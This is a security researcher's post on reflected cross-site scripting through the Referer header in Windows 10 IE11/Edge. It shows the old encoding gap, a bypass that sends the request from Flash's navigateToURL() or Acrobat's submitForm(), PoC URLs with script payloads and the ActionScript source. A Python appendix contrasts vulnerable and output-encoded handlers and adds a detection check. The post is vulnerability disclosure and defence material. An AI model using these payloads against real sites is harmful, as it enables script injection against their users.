The following page writes the HTTP_REFERER and document.referrer values directly into the response: https://vulnerabledoma.in/xss_referrer
Previously, IE/Edge did not encode the "<> characters in the referrer string, so we could XSS on that page with the following PoC: https://l0.cm/xss_referrer_oldpoc.html?<script>alert("1")</script>
But since the Windows 10 Anniversary Update, IE11/Edge encodes them. You will get the following encoded strings from that page:
HTTP_REFERER: https://l0.cm/xss_referrer_oldpoc.html?%3Cscript%3Ealert(%221%22)%3C/script%3E
document.referrer: https://l0.cm/xss_referrer_oldpoc.html?%3Cscript%3Ealert(%221%22)%3C/script%3E
Too bad!
Of course, we can still use IE11 on Win8.1/7. But you also want to XSS on Win10, don't you? :D
Today, I would like to introduce a small technique: XSS using the referrer on the latest Win10 Edge/IE11.
The technique is very simple. You can easily include the "<> string in the referrer if you send the request from Flash's navigateToURL() method, like this: https://l0.cm/xss_referrer.swf?<script>alert(1)</script>
The ActionScript code is here:

    package {
        import flash.display.Sprite;
        import flash.net.URLRequest;
        import flash.net.navigateToURL;

        public class xss_referrer extends Sprite {
            public function xss_referrer() {
                // Navigate the current window to the target page from inside the SWF.
                // The Referer sent with this request is the SWF's own URL, query string
                // included, and the "<> characters in it are not encoded.
                var url:URLRequest = new URLRequest("https://vulnerabledoma.in/xss_referrer");
                navigateToURL(url, "_self");
            }
        }
    }

As you can see from the access result, we can XSS via the Referer request header. But sadly, we cannot XSS via the document.referrer property because it becomes empty. Dang :p

FYI, I can also reproduce it via the submitForm() method of the JavaScript for Acrobat API. I confirmed it on Win10 IE11 with the Adobe Reader plugin.
PoC is here:
https://l0.cm/xss_referrer.pdf?<script>alert(1)</script>
It seems that requests sent via plugins are not considered by the browser's encoding.
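As an added illustration (not code from this post or from the test site), here is a minimal Python WSGI handler that reflects the CGI-style HTTP_REFERER variable the way the test page does, beside the output-encoded version, plus a server-side check for Referer values that still contain raw "<> characters. The host attacker.test and both sample Referer values are constructed.

```python
import html

# Constructed sample Referer values (placeholder host, not the post's PoC URLs).
# After the Windows 10 update, a navigation from IE11/Edge arrives percent-encoded;
# the Flash/Acrobat-originated request described above arrives with the characters intact.
BROWSER_REFERER = "https://attacker.test/poc.html?%3Cscript%3Ealert(%221%22)%3C/script%3E"
PLUGIN_REFERER = 'https://attacker.test/poc.swf?<script>alert("1")</script>'


def render_referrer(referer: str, hardened: bool) -> str:
    """Build the page body. hardened=False mirrors the test page's flaw (Referer written
    verbatim); hardened=True encodes for the HTML text context at output time."""
    value = html.escape(referer, quote=True) if hardened else referer
    return "<p>HTTP_REFERER: " + value + "</p>"


def make_app(hardened: bool):
    """Minimal WSGI app that reads HTTP_REFERER from the environ, as a CGI page would."""
    def app(environ, start_response):
        body = render_referrer(environ.get("HTTP_REFERER", ""), hardened).encode("utf-8")
        start_response("200 OK", [("Content-Type", "text/html; charset=utf-8")])
        return [body]
    return app


def handle(app, referer: str) -> str:
    """Drive a WSGI app with a constructed environ and return the decoded response body."""
    environ = {"REQUEST_METHOD": "GET", "HTTP_REFERER": referer}
    chunks = app(environ, lambda status, headers: None)
    return b"".join(chunks).decode("utf-8")


def is_raw_metachar_referer(referer: str) -> bool:
    """Detection aid: a Referer carrying a literal <, > or " did not pass through the
    browser's URL encoding, which is the signal that a plugin or non-browser client sent it."""
    return any(ch in referer for ch in '<>"')


if __name__ == "__main__":
    for name, ref in (("browser", BROWSER_REFERER), ("plugin", PLUGIN_REFERER)):
        print(name, "-> flagged" if is_raw_metachar_referer(ref) else "-> clean")
        print("  vulnerable:", handle(make_app(False), ref))
        print("  hardened:  ", handle(make_app(True), ref))
```

The fix is output encoding at the point where the value is written into HTML; the server must not rely on the client having percent-encoded the Referer, since the plugin path shows that it may not.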
That's it. It might be helpful in some cases :)
Thanks!